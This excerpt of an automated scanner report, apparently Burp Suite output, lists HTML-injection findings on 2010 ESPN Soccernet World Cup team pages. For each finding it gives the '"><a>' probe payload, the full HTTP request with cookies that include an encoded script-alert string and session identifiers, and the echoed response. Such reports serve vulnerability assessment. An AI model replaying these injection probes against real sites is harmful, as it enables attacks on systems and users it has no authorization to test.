Cache-Expires: Sat, 06 Nov 2010 23:13:57 GMT
Content-Length: 81910
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Chile Football / So ...[SNIP]... <a href="/worldcup2010/team?team=207&_slug_=chile977b9"><a>d4b442ea0d6&topId=803725&linktext=Brilliant+Brazil+put+three+past+Chile"> ...[SNIP]...
2.12. http://soccernet.espn.go.com/worldcup2010/team/_/team/207/chile [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/207/chile
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebe29"><a>f1fd16cfb8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/207/chile?ebe29"><a>f1fd16cfb8e=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:07:29 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:07:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN12
Cache-Expires: Sat, 06 Nov 2010 23:12:29 GMT
Content-Length: 82018
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Chile Football / So ...[SNIP]... <a href="/worldcup2010/team?team=207&ebe29"><a>f1fd16cfb8e=1&_slug_=chile&ebe29"> ...[SNIP]...
2.13. http://soccernet.espn.go.com/worldcup2010/team/_/team/210/paraguay [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/210/paraguay
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d453d"><a>904bfdecc42 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/210/paraguayd453d"><a>904bfdecc42 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:26:44 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:26:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN18
Cache-Expires: Sat, 06 Nov 2010 23:31:44 GMT
Content-Length: 82073
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Paraguay Football / ...[SNIP]... <a href="/worldcup2010/team?team=210&_slug_=paraguayd453d"><a>904bfdecc42&topId=799269&linktext=Gerardo+Martino+to+remain+as+coach"> ...[SNIP]...
2.14. http://soccernet.espn.go.com/worldcup2010/team/_/team/210/paraguay [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/210/paraguay
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e861b"><a>1c6180afac1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/210/paraguay?e861b"><a>1c6180afac1=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:22:55 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:22:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN12
Cache-Expires: Sat, 06 Nov 2010 23:27:55 GMT
Content-Length: 82181
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Paraguay Football / ...[SNIP]... <a href="/worldcup2010/team?team=210&e861b"><a>1c6180afac1=1&_slug_=paraguay&e861b"> ...[SNIP]...
2.15. http://soccernet.espn.go.com/worldcup2010/team/_/team/212/uruguay [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/212/uruguay
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 416ae"><a>174e4000843 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/212/uruguay416ae"><a>174e4000843 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:29:33 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:29:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN31
Cache-Expires: Sat, 06 Nov 2010 23:34:33 GMT
Content-Length: 81983
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Uruguay Football / ...[SNIP]... <a href="/worldcup2010/team?team=212&_slug_=uruguay416ae"><a>174e4000843&topId=807748&linktext=Germany+finish+in+third+place"> ...[SNIP]...
2.16. http://soccernet.espn.go.com/worldcup2010/team/_/team/212/uruguay [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/212/uruguay
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f178"><a>aa580cad459 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/212/uruguay?2f178"><a>aa580cad459=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:48 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN32
Cache-Expires: Sat, 06 Nov 2010 23:33:48 GMT
Content-Length: 82091
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Uruguay Football / ...[SNIP]... <a href="/worldcup2010/team?team=212&2f178"><a>aa580cad459=1&_slug_=uruguay&2f178"> ...[SNIP]...
2.17. http://soccernet.espn.go.com/worldcup2010/team/_/team/215/honduras [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/215/honduras
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fd53"><a>9d87ae988a2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/215/honduras2fd53"><a>9d87ae988a2 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:09:37 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:09:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN16
Cache-Expires: Sat, 06 Nov 2010 23:14:37 GMT
Content-Length: 81718
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Honduras Football / ...[SNIP]... <a href="/worldcup2010/team?team=215&_slug_=honduras2fd53"><a>9d87ae988a2&topId=802308&linktext=Coach+happy+after+claiming+point"> ...[SNIP]...
2.18. http://soccernet.espn.go.com/worldcup2010/team/_/team/215/honduras [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/215/honduras
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 914aa"><a>4f86e09379e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/215/honduras?914aa"><a>4f86e09379e=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:25 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN11
Cache-Expires: Sat, 06 Nov 2010 23:13:25 GMT
Content-Length: 81826
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Honduras Football / ...[SNIP]... <a href="/worldcup2010/team?team=215&914aa"><a>4f86e09379e=1&_slug_=honduras&914aa"> ...[SNIP]...
2.19. http://soccernet.espn.go.com/worldcup2010/team/_/team/2666/new-zealand [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/2666/new-zealand
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17070"><a>7043290c14 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/2666/new-zealand17070"><a>7043290c14 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
